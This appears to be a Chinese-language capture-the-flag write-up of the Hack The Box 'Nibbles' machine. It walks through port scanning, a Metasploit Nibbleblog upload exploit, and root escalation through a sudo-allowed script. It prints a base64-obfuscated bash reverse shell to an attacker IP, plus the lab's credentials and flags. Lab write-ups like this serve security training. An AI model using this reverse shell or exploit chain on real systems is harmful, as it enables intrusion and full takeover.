[Meachines] [Easy] nibbles Nibbleblog-Upload

2024-08-14 128 0

信息收集

IP Address Opening Ports
10.10.10.75 TCP:22,80

$ nmap -p- 10.10.10.75 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP&www-data

$ curl http://10.10.10.75

[Meachines] [Easy] nibbles Nibbleblog-Upload插图

[Meachines] [Easy] nibbles Nibbleblog-Upload插图1

$ gobuster dir -u "http://10.10.10.75/nibbleblog" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x html,txt,php -b 404,403 -t 50

[Meachines] [Easy] nibbles Nibbleblog-Upload插图2

http://10.10.10.75/nibbleblog/update.php

$ searchsploit Nibbleblog

[Meachines] [Easy] nibbles Nibbleblog-Upload插图3

msf6 > use exploit/multi/http/nibbleblog_file_upload

msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.16.14

http://10.10.10.75/nibbleblog/content/private/users.xml

[Meachines] [Easy] nibbles Nibbleblog-Upload插图4

[Meachines] [Easy] nibbles Nibbleblog-Upload插图5

username:admin password:nibbles

http://10.10.10.75/nibbleblog/admin.php

[Meachines] [Easy] nibbles Nibbleblog-Upload插图6

msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles

msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin

msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog

msf6 exploit(multi/http/nibbleblog_file_upload) > runf

[Meachines] [Easy] nibbles Nibbleblog-Upload插图7

User.txt

895e7888ead0ee3699b05fcd82ae8a4e

权限提升

nibbler@Nibbles:/tmp$ sudo -l

[Meachines] [Easy] nibbles Nibbleblog-Upload插图8

$ mkdir -p /home/nibbler/personal/stuff

$ echo 'L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjE0LzEwMDM1IDA+JjEiCg=='|base64 -d >/home/nibbler/personal/stuff/monitor.sh

$ chmod +x /home/nibbler/personal/stuff/monitor.sh

$ sudo /home/nibbler/personal/stuff/monitor.sh

[Meachines] [Easy] nibbles Nibbleblog-Upload插图9

Root.txt

c7d95df1cb6437197c6ae40bcce2bdc5

相关文章:

  1. [Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…
  2. [Vulnhub] IMF File Upload Bypass&Buffer Overflow
  3. [Meachines][Hard]Analysis
  4. [Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…
  5. [Meachines] [Easy] Sense PFSense防火墙RCE

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

4A测评
网络安全
0 0

相关文章

电力企业 | 安全建设框架
HTB-Infiltrator:一文带你走进域渗透
JAVA安全 | Classloader:理解与利用一篇就够了
多角度揭秘威胁行为组织CryptoCore复杂的加密货币欺诈活动
网络空间的“边水往事”?针对华语黑产及用户进行攻击的 APT-K-UN3 活动分析
伪装“黑神话悟空修改器”传播木马的活动分析

发布评论